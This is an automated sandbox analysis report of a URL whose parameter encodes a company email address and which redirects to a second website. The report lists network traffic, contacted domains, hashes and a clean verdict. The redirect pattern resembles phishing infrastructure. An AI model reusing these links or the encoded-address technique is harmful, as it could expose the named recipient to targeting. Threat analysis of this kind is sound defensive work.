Edit tour

Windows Analysis Report
https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=

Overview

General Information

Sample URL:	https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=
Analysis ID:	1426717
Infos:

Detection

Score:	1
Range:	0 - 100
Whitelisted:	false
Confidence:	80%

Signatures

HTML body contains low number of good links

HTML title does not match URL

Classification

Process Tree

System is w10x64

chrome.exe (PID: 4944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5244 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1988,i,4898792362538319792,12946556423901625066,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=

HTTP Parser: Number of links: 0

Source: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=

HTTP Parser: Title: Document does not match URL

Source: https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	HTTP Parser: No favicon
Source: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	HTTP Parser: No favicon
Source: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	HTTP Parser: No favicon

Source: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	HTTP Parser: No <meta name="author".. found
Source: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	HTTP Parser: No <meta name="author".. found

Source: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	HTTP Parser: No <meta name="copyright".. found
Source: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 23.220.189.216
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	TCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20= HTTP/1.1Host: sunshivproperties.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /views/partials/footer.js HTTP/1.1Host: sunshivproperties.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: sunshivproperties.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20= HTTP/1.1Host: warrentongroup.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sunshivproperties.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-setting.js HTTP/1.1Host: warrentongroup.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: warrentongroup.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/05/cropped-TWG_green_LOGO_color-32x32.png HTTP/1.1Host: www.warrentongroup.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://warrentongroup.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2022/05/cropped-TWG_green_LOGO_color-32x32.png HTTP/1.1Host: www.warrentongroup.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: chromecache_51.2.dr	String found in binary or memory: window.location.href = "https://www.youtube.com"; equals www.youtube.com (Youtube)
Source: chromecache_49.2.dr	String found in binary or memory: window.location.href = 'https://www.youtube.com/live'; equals www.youtube.com (Youtube)
Source: chromecache_49.2.dr	String found in binary or memory: window.location.href = 'https://www.youtube.com/live'; equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: sunshivproperties.com

Source: unknown

HTTP traffic detected: POST /report/v4?s=FVNDvvcLmx2WJFM1GObnV3A8k24Xo4QcgDeTJP54UVHL42fG0ur4gRuybv6FeMLWjIygd5azM8bmNaVCBAzs7PnLh0rnmGO2evDWk%2FZewBzvhjJ9Fu3iDMqqSKFOlZAuyWMBeGmT8J4%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 506Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Apr 2024 12:21:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVNDvvcLmx2WJFM1GObnV3A8k24Xo4QcgDeTJP54UVHL42fG0ur4gRuybv6FeMLWjIygd5azM8bmNaVCBAzs7PnLh0rnmGO2evDWk%2FZewBzvhjJ9Fu3iDMqqSKFOlZAuyWMBeGmT8J4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87542253cac017f7-ATLalt-svc: h3=":443"; ma=86400

Source: chromecache_52.2.dr	String found in binary or memory: http://softwiz.in
Source: chromecache_52.2.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Lato:400
Source: chromecache_52.2.dr	String found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:300
Source: chromecache_52.2.dr	String found in binary or memory: https://www.google.com/maps/embed?pb=
Source: chromecache_51.2.dr	String found in binary or memory: https://www.youtube.com
Source: chromecache_49.2.dr	String found in binary or memory: https://www.youtube.com/live

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.220.189.216:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: classification engine

Classification label: clean1.win@17/17@12/6

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1988,i,4898792362538319792,12946556423901625066,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20="
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1988,i,4898792362538319792,12946556423901625066,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	0%	Virustotal		Browse

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
warrentongroup.com	0%	Virustotal	Browse
sunshivproperties.com	0%	Virustotal	Browse
www.warrentongroup.com	0%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://softwiz.in	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
a.nel.cloudflare.com	35.190.80.1	true	false		high
warrentongroup.com	142.4.12.244	true	false	0%, Virustotal, Browse	unknown
www.warrentongroup.com	142.4.12.244	true	false	0%, Virustotal, Browse	unknown
www.google.com	64.233.177.103	true	false		high
sunshivproperties.com	104.21.54.147	true	false	0%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Reputation
https://sunshivproperties.com/views/partials/footer.js	false	unknown
https://warrentongroup.com/wp-setting.js	false	unknown
https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	false	unknown
https://sunshivproperties.com/favicon.ico	false	unknown
https://www.warrentongroup.com/wp-content/uploads/2022/05/cropped-TWG_green_LOGO_color-32x32.png	false	unknown
https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=	false	unknown
https://a.nel.cloudflare.com/report/v4?s=FVNDvvcLmx2WJFM1GObnV3A8k24Xo4QcgDeTJP54UVHL42fG0ur4gRuybv6FeMLWjIygd5azM8bmNaVCBAzs7PnLh0rnmGO2evDWk%2FZewBzvhjJ9Fu3iDMqqSKFOlZAuyWMBeGmT8J4%3D	false	high
https://warrentongroup.com/favicon.ico	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.youtube.com/live	chromecache_49.2.dr	false		high
http://softwiz.in	chromecache_52.2.dr	false	0%, Virustotal, Browse	unknown
https://www.google.com/maps/embed?pb=	chromecache_52.2.dr	false		high
https://www.youtube.com	chromecache_51.2.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
239.255.255.250	unknown	Reserved	unknown	unknown	false
64.233.177.103	www.google.com	United States	15169	GOOGLEUS	false
142.4.12.244	warrentongroup.com	United States	46606	UNIFIEDLAYER-AS-1US	false
104.21.54.147	sunshivproperties.com	United States	13335	CLOUDFLARENETUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1426717
Start date and time:	2024-04-16 14:20:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://sunshivproperties.com/views/partials/header.html?white=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	CLEAN
Classification:	clean1.win@17/17@12/6
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.105.94, 142.250.105.138, 142.250.105.139, 142.250.105.113, 142.250.105.100, 142.250.105.102, 142.250.105.101, 74.125.138.84, 34.104.35.123, 173.194.219.95, 172.253.124.95, 74.125.138.95, 64.233.176.95, 64.233.185.95, 172.217.215.95, 64.233.177.95, 74.125.136.95, 108.177.122.95, 142.250.9.95, 142.251.15.95, 142.250.105.95, 13.85.23.86, 199.232.210.172, 192.229.211.108, 52.165.164.15, 13.95.31.18, 74.125.136.94
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1143
Entropy (8bit):	7.755523577382152
Encrypted:	false
SSDEEP:	24:2LXYGLZNfXRpEi1w7I8jHGt3CY0fCsR/X4doV6V:2ThzPRm8w/GtSY0fCsRvjo
MD5:	CEDE1310BD3C3BE43262B8A177B8C98C
SHA1:	DE82F86DACFA5F3081B486043B00CCA696DBDB58
SHA-256:	341D6C20833DB61D42978C86382DE1F3FFD4DF0CAD66E66E9EB77986716FA0ED
SHA-512:	2439DC8D7ECB98ACBED214C936E4E836F97008EBD7102FEBB9CD1F42F08CD6333C06A02181B9C22C98C22809AE61747055FD17AEF2887940710D216EE12A91D7
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR... ... .....szz.....pHYs..........+.....)IDATX..]..U....e.d....[lf.DJ....f$."...w.RB.]#..."."4LqgM(......>.....0..r....%...Y..E....;3.k].....s...<.{f...M....)...q.X.T.o.2A6ex.x....Ij...3..}/\..Q...d.\..&.mI...3..).o.at...An!8......~..._........"......q.}3/.t>..S..........+...N.....B.!R...8.>...L..0>,.'9.{.....l.I@..})..Tm.......Av..Wk.~=....".r.e.G%u. ...F..mk._..'.K.nq.JX....i....\|.2....I.}.pW.F.......t.~./l.3P.\|R.z........../.......I....q..8,.....;.\|...Y..Gq.]..+..(..F..^.....6aF...9.&.l]. .....5Y.{.RG2.[.4.t....$-.(.Oa.&.f....po...B...Igq.8...HV..'.........h%,W..<. )e..,.=../.w&..7..^....}...<..p$.w..K...T.b.5^f.\|.i..H2.-...O..6.%..d...5..n....9... -...&...B..G2..T... z.......u.=.[.N..:...VdA.;.2...+.6........L6.1U&.$Fl.%.m.\|...p.a..i.a..F.J.<h.k.B.B[...P{.hor.U6.Z\|.?.....5.. ...C<o.RbtF......b:.vM.)2.3.C.H&....=3...}....;..Ot.-.dW..K..#6..atv......v!...>....\|.n&..`.T>6U....8x.P.u......[..)..4....cH}.......6..'.$t..J....

Chrome Cache Entry: 49

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text
Category:	downloaded
Size (bytes):	6405
Entropy (8bit):	4.966798910100789
Encrypted:	false
SSDEEP:	96:9QKxkKcFFTIQGeoongw/1IsFtS2rBOsG4QJcQnchhIMrB780uoe9k:jkKcFFMQGmgw/1IsFtU94QahIs7Ck
MD5:	8133031D4F7D42308D07AF74E52F3184
SHA1:	701E017A826C2BEDE9F9F6F063250236A1F00B3A
SHA-256:	D71593A023F223B9CF20BCD4696DA2325DF6B53FA881A2863E5DA4E111B8DFFA
SHA-512:	01A2E27B34CD28E8ED6AD800D7D244AEB7FFF6F6FF640B5F6E7F9A92B35B86096BAA50796A11ADC8438BF457880DB7B6540BDBCF060AA8C7659A4A8154412E66
Malicious:	false
Reputation:	low
URL:	https://warrentongroup.com/wp-sample.html?code=bWFya2V0aW5nQGJ5cmFtaGVhbHRoY2FyZS5jb20=
